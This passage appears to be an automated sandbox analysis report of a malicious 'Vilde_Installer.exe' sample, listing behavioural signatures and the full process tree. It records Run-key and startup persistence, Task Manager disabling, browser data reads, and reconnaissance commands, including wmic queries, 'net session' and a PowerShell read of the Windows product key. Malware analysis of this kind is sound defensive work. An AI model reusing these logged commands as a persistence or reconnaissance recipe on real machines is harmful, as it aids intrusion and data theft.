| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Vilde_Installer.exe | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\GooseDesktop.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetup79mlt7 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\Vilde_Installer.exe" | C:\Windows\system32\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe"
C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1440 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=1440 get ExecutablePath
C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\autoantibody" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1988 --field-trial-handle=1992,i,16408176841100345989,15699874884064010324,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\autoantibody" --mojo-platform-channel-handle=2172 --field-trial-handle=1992,i,16408176841100345989,15699874884064010324,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1440 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=1440 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"
C:\Windows\system32\cmd.exe
